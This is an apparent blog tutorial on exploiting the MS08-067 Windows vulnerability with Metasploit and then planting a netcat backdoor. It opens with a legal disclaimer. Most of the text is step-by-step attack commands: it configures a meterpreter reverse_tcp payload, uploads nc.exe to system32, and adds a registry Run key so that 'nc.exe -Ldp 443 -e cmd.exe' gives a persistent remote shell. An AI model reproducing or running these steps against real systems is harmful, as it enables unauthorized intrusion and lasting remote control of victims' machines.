How to own a Windows XP Sp2 system using MS08-67 vulnerability and run netcat as backdoor with Meterpreter?

How to own a Windows XP Sp2 system using MS08-67 vulnerability and run netcat as backdoor with Meterpreter?

 

Microsoft Security Bulletin MS08-067 – Critical

DISCLAIMER:

Content provided in this blog can only be used for your own educative purposes. Using these hacks outside of your own computer or network is forbidden and strictly illegal. If you use these techniques in an illegal way you will be punished by law. Our articles and blogs provided and created for testing internet security and for learning how to help the world make a new security and how to close the holes, backdoors and any other internet security related help and fixes.

Owners of this blog are not responsible for your illegal actions.

Executive Summary:

Remote code execution vulnerability exists in the Server service on Windows systems. The vulnerability is due to the service not properly handling specially crafted RPC requests. In this video we demonstrate how to make use of this vulnerability with the help of Metasploit and install as Backdoor on Windows XP sp2 systems.

The generic lab setup for this demonstration will be as follows:

Consider victim machine running on windows XP sp2.

To get the ip address Go to

START -> RUN and type ‘cmd’, type ‘ipconfig’ which displays the ip address. (10.10.1.102)

As an attacker’s machine, we use BackTrack 4

Switching to BackTrack 4

To get the ip address in BackTrack,

Click on konsole icon on the taskbar and type ‘ifconfig’. (10.10.1.105)

For this demonstration we will be working on console mode of Metasploit framework3.

Change present working directory to ‘/pentest/exploits/framework3’    

To run Metasploit execute ‘./msfconsole’

Metasploit welcome screen displays available exploits, payloads, encoders etc.

Enter ‘search 067’ to search the ms08_067_netapi exploit module

Now we need to tell Metasploit to use ms_08_067_netapi module, for this type:

‘use windows/smb/ms08_067_netapi

‘show options’ displays the current settings and the settings required to change.

RHOST is Remote Host, set RHOST by typing

‘set  RHOST  >’

‘show payloads’ command will list all payloads that are compatible with the selected exploit

Set reverse_tcp payload by typing:

‘Set PAYLOAD windows/meterpreter/reverse_tcp’

use the ‘show options’ command to check which options have been set and which are required to be set

LHOST is Local Host, set LHOST by typing

‘set LHOST    ip>’

use ‘show option’ to check the changed settings

The ‘show targets’ command will list all available targets for the selected exploit module

The ‘exploit ‘command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system.

If everything goes well, you get the meterpreter shell.

To run command on victim’s machine type:

‘execute –f cmd.exe –c’

To get the victim’s shell type:

‘interact 1’

Now we will create a backdoor using netcat.

Close the current connection.

Open a new konsole, konsole2 and copy netcat in tmp directory by typing:

‘cp /pentest/windows-binaries/tools/nc.exe /tmp’

type ‘cd  /tmp’ to change present working directory

to list the files type:

‘ls’

Go back to konsole1

To upload nc.exe in victim’s system32 folder type:

‘upload /tmp/nc.exe c:\\windows\\system32’

we work with the registry to have netcat execute on start up and listen on port 443.

Type:

‘reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run’

to add netcat in registry type:

‘reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe"’

To check recently made entries in registry type:

‘reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc’

Exit from meterpreter shell.

Now netcat will be listening on port 443 even after every restart.

Restart windows xp.

To check listening and opening  ports type:

‘netstat –an’

netcat is listening on port 443

To connect back to victim’s machine type:

‘telnet 443’

This would again give you the victim’s shell. 

Conclusion

Undoubtedly (MS08-67), which was used by Conficker and many of its type variant worms, is one of the biggest issues. So in this article we demonstrate how to use Metasploit, work on (MS08-67) exploit, own Windows XP sp2 systems and place netcat as a backdoor on the victim system.